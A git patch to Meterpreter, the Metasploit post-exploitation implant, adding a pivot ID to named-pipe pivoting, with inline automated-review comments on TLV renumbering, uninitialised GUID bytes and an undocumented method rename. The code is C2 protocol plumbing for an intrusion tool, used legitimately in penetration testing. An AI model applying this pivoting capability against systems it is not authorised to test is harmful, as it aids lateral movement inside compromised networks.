From cba5e86ac296d7b4546cfeae3ed60b419a002b45 Mon Sep 17 00:00:00 2001
From: OJ
Date: Tue, 11 Jul 2017 19:43:23 +1000
Subject: [PATCH] Add support for the pivot ID

---
 c/meterpreter/source/common/core.h | 7 ++++---
 .../source/server/win/server_pivot_named_pipe.c | 12 ++++++++++--
 2 files changed, 14 insertions(+), 5 deletions(-)

diff --git a/c/meterpreter/source/common/core.h b/c/meterpreter/source/common/core.h
index c9ed0c66..7690c0e0 100755
--- a/c/meterpreter/source/common/core.h
+++ b/c/meterpreter/source/common/core.h
@@ -172,9 +172,10 @@ typedef enum
 	TLV_TYPE_ENC_SYM_KEY = TLV_VALUE(TLV_META_TYPE_RAW, 553), ///! Represents and RSA-encrypted symmetric key
 
 	// Pivots
-	TLV_TYPE_PIVOT_STAGE_DATA = TLV_VALUE(TLV_META_TYPE_RAW, 650), ///! Represents the data to be staged on new connections.
-	TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_VALUE(TLV_META_TYPE_UINT, 651), ///! Represents the size of the data to be staged on new connections.
-	TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_VALUE(TLV_META_TYPE_STRING, 652), ///! Represents named pipe name.
+	TLV_TYPE_PIVOT_ID = TLV_VALUE(TLV_META_TYPE_RAW, 650), ///! Represents the id of the pivot listener
+	TLV_TYPE_PIVOT_STAGE_DATA = TLV_VALUE(TLV_META_TYPE_RAW, 651), ///! Represents the data to be staged on new connections.
+	TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_VALUE(TLV_META_TYPE_UINT, 652), ///! Represents the size of the data to be staged on new connections.
+	TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_VALUE(TLV_META_TYPE_STRING, 653), ///! Represents named pipe name.
 
 	TLV_TYPE_EXTENSIONS = TLV_VALUE(TLV_META_TYPE_COMPLEX, 20000), ///! Represents an extension value.
 	TLV_TYPE_USER = TLV_VALUE(TLV_META_TYPE_COMPLEX, 40000), ///! Represents a user value.
diff --git a/c/meterpreter/source/server/win/server_pivot_named_pipe.c b/c/meterpreter/source/server/win/server_pivot_named_pipe.c
index 1a9ec1da..1320951a 100755
--- a/c/meterpreter/source/server/win/server_pivot_named_pipe.c
+++ b/c/meterpreter/source/server/win/server_pivot_named_pipe.c
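Review bot: Renumbering the three pre-existing pivot TLVs (650–652 become 651–653) to slot TLV_TYPE_PIVOT_ID in at 650 changes the wire encoding of types that already shipped, so a controller built against the old header would hand this server its stage data under the pivot-id number and vice versa; appending the new type at 653 would have kept the existing values stable, and if the renumbering is deliberate the commit message should state that the peer side must be updated in lockstep. The new entry is declared as RAW with no length given, while the server side of this patch copies exactly sizeof(GUID) bytes out of it, so the contract the code relies on belongs in the comment: `///! Represents the id of the pivot listener (opaque 16-byte GUID, carried as raw bytes)`. The enclosing typedef enum starts and ends outside this hunk.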
@@ -15,6 +15,7 @@ typedef struct _NamedPipeContext
 	OVERLAPPED read_overlap;
 	OVERLAPPED write_overlap;
 	char name[PIPE_NAME_SIZE];
+	GUID pivot_id;
 	Remote* remote;
 	HANDLE pipe;
 	BOOL connecting;
@@ -466,8 +467,9 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon
 	guid.Data2 = htons(guid.Data2);
 	guid.Data3 = htons(guid.Data3);
 
-	Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_new");
-	packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&guid, sizeof(GUID));
+	Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_new");
+	packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&guid, sizeof(guid));
+	packet_add_tlv_raw(notification, TLV_TYPE_PIVOT_ID, (LPVOID)&serverCtx->pivot_id, sizeof(serverCtx->pivot_id));
 	packet_transmit(serverCtx->remote, notification, NULL);
 
 	PivotContext* pivotContext = (PivotContext*)calloc(1, sizeof(PivotContext));
@@ -554,6 +556,12 @@ DWORD request_core_pivot_add_named_pipe(Remote* remote, Packet* packet)
 		namedPipeServer = ".";
 	}
 
+	LPBYTE pivotId = packet_get_tlv_value_raw(packet, TLV_TYPE_PIVOT_ID);
+	if (pivotId != NULL)
+	{
+		memcpy(&ctx->pivot_id, pivotId, sizeof(ctx->pivot_id));
+	}
+
 	LPVOID stageData = packet_get_tlv_value_raw(packet, TLV_TYPE_PIVOT_STAGE_DATA);
 	ctx->stage_data_size = packet_get_tlv_value_uint(packet, TLV_TYPE_PIVOT_STAGE_DATA_SIZE);
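Review bot: The new `GUID pivot_id;` member is the only piece of per-listener state in this struct whose origin and lifetime are not obvious from its name, and it carries no comment; later in this patch it is filled by memcpy from an incoming TLV and echoed back verbatim in a notification, which is worth recording at the declaration: `GUID pivot_id; // opaque listener id supplied by the controller in core_pivot_add_named_pipe; echoed back unmodified in core_pivot_session_new`. Nothing in the hunk shows whether the context is zero-initialised when no id is supplied, so the comment should not promise a zero GUID in that case. The struct _NamedPipeContext definition starts and ends outside this hunk.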
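Review bot: The third added line always transmits `serverCtx->pivot_id`, yet the id is only populated when the add request actually carried a TLV_TYPE_PIVOT_ID (the copy later in this patch is guarded by `if (pivotId != NULL)`), so on a request without one the bytes sent are whatever the context held at allocation, which cannot be seen from here. Either make the TLV mandatory in request_core_pivot_add_named_pipe or record whether it was set and skip the TLV when it was not, so the controller never matches a stale or zero GUID against its listeners. Unlike the session GUID, whose Data2/Data3 are byte-swapped just above, pivot_id is deliberately sent back exactly as it arrived; a comment such as `// pivot_id is opaque to us: echoed byte-for-byte, no endian fix-up like the session GUID` would stop a future maintainer from "correcting" it. The rename from "core_pivot_new" to "core_pivot_session_new" also changes the method name the controller dispatches on, which the commit message does not mention. server_notify begins and ends outside this hunk.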